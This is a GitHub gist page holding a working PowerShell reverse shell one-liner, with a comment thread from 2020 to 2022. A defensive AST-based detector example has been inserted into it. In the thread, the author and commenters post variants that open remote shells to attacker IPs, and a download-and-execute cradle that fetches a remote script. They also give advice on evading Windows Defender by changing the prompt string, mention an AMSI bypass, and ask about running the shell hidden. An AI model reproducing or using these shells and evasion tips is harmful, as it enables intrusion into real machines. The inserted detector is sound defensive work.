powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
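
For defenders, the one-liner above and the variants posted in the comments below share one structure: a TCP client socket whose stream is read and passed to Invoke-Expression, with only the prompt string changing between them. The following added example (not part of the gist and not written by its author) parses script text with the PowerShell language parser and flags that structure; the function name, the sample strings and the 192.0.2.10 address are constructed for illustration.

```powershell
# Added example, not from the gist. Flags script text that opens a TCP client,
# uses its stream, and calls Invoke-Expression, whatever prompt string it sends back.
function Test-SocketFedInvokeExpression {   # hypothetical helper name
    param([Parameter(Mandatory)][string]$ScriptText)

    $tokens = $null; $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)

    # Collect every command and method call, including nested script blocks.
    $commands = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.CommandAst] }, $true)
    $methods  = $ast.FindAll({ $args[0] -is [System.Management.Automation.Language.InvokeMemberExpressionAst] }, $true)

    $opensSocket = [bool]($commands | Where-Object {
            $_.GetCommandName() -eq 'New-Object' -and $_.Extent.Text -match 'Net\.Sockets\.TcpClient' })
    $usesStream  = [bool]($methods | Where-Object { $_.Member.Extent.Text -in 'GetStream', 'Read' })
    $evaluates   = [bool]($commands | Where-Object { $_.GetCommandName() -in 'iex', 'Invoke-Expression' })

    [pscustomobject]@{
        OpensSocket = $opensSocket
        UsesStream  = $usesStream
        Evaluates   = $evaluates
        Flagged     = $opensSocket -and $usesStream -and $evaluates
    }
}

# Constructed script-block samples; they are parsed only, never executed.
$samples = [ordered]@{
    'prompt with (pwd).Path' = @'
$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',80);$stream = $client.GetStream();while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$sendback = (iex ". { $data } 2>&1" | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '}
'@
    'prompt replaced' = @'
$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',80);$stream = $client.GetStream();while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + '# '}
'@
    'benign port check' = @'
$c = New-Object System.Net.Sockets.TcpClient;$c.Connect('192.0.2.10',443);$c.Connected;$c.Close()
'@
    'benign iex of local file' = @'
iex (Get-Content .\build-steps.ps1 -Raw)
'@
}

foreach ($name in $samples.Keys) {
    $r = Test-SocketFedInvokeExpression -ScriptText $samples[$name]
    '{0,-26} prompt-literal match: {1,-5} structural match: {2}' -f $name, ($samples[$name] -match '\(pwd\)\.Path'), $r.Flagged
}
```

With script block logging enabled, the same function can be applied to the script text recorded in event ID 4104 of the Microsoft-Windows-PowerShell/Operational log.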

Vedant-Bhalgama commented Jul 25, 2020

Thanks Mate!


Vedant-Bhalgama commented Jul 25, 2020

And where can I scan for the results of the .ps1 file? It doesn't work on antiscan.me, and nodistribute also doesn't work.


ghost commented Jul 25, 2020


ghost commented Jul 25, 2020


Vedant-Bhalgama commented Jul 25, 2020

Also it ran first time but second time it was detected.

Author

egre55 commented Jul 25, 2020

try this: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')" @Vedant-Bhalgama

with your reverse shell looking like:

$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

you should get a shell on your Netcat listener on port 80


ghost commented Jul 25, 2020

Author

egre55 commented Jul 25, 2020

if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"


ghost commented Jul 25, 2020


Vedant-Bhalgama commented Jul 25, 2020

Yes! I am not using it for non-ethical purposes, bro! I am an ethical hacker and need this for pentesting purposes!


ghost commented Jul 25, 2020


Vedant-Bhalgama commented Jul 25, 2020

The script is running now but it gives a detection error.
@egre55, what were you telling me to replace to evade Defender? Can you make the changes in the code?


epicn1337 commented Aug 21, 2020

One way or the other, this script can be a disaster. This is the best way I run such a script. Make sure you add powershell -nop -c, followed by:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


Vedant-Bhalgama commented Aug 21, 2020

Which listener can be used for this? NetCat?

Author

egre55 commented Aug 21, 2020


Vedant-Bhalgama commented Aug 22, 2020

It got detected as MaliciousContent, Anything else? Should I try Obfuscation?


Yashraj-Garnayak commented Nov 4, 2020

After executing it in PowerShell with the IP and port changed, it shows "new object exception calling ctor with 2 argument s connection attempt failed". What should I do? I am not a PowerShell expert.
I run the netcat server in VirtualBox.


ghost commented Nov 12, 2020


munteanulc commented Jan 11, 2021

The Windows Defender action is triggered by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"


cnibbler commented Feb 11, 2021

Hi, Kindly check my fork.

Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).

Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,


pentestblogin commented Apr 16, 2021

very nice )


pretech86 commented Apr 27, 2021

I tried to run it silently with -WindowsStyle Hidden -NoLog but it is not working. How can I run it silently?


CalfCrusher commented Jul 29, 2021

The Windows Defender action is triggered by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything


Developer-Mike commented Sep 14, 2021

Hi, can someone explain how exactly this works? Why does (pwd).Path trigger the antivirus? And is this reverse shell only available until a restart of the victim's PC? I didn't find any explanation online. Thanks in advance.


rikuru-to865 commented Sep 25, 2021

Good job!
It detected AMSI, but I used an AMSI bypass script before running this script, so this script runs successfully!


mappl3 commented Feb 1, 2022

Looks like the shell did not return stderr, is it possible to return stderr as well?

Author

egre55 commented Feb 1, 2022

hey @mappl3, feel free to add this in your fork and I'll update it ;). You can also append 2>&1 to the end of a command to get stderr.


Veids commented Oct 4, 2022

Got stderr working with this modification:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
And if you want to catch some errors:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);try { $sendback = (iex ". { $data } 2>&1" | Out-String ); } catch { $sendback = "$_`n"}; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Author

egre55 commented Oct 4, 2022

that's the one-liner updated with your addition for stderr. thanks for your contribution @Veids!


ChillVibesMushroom commented Oct 31, 2022

The Windows Defender action is triggered by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

How would I run this from a bat file, and what book do you recommend to learn PowerShell scripting on this level?
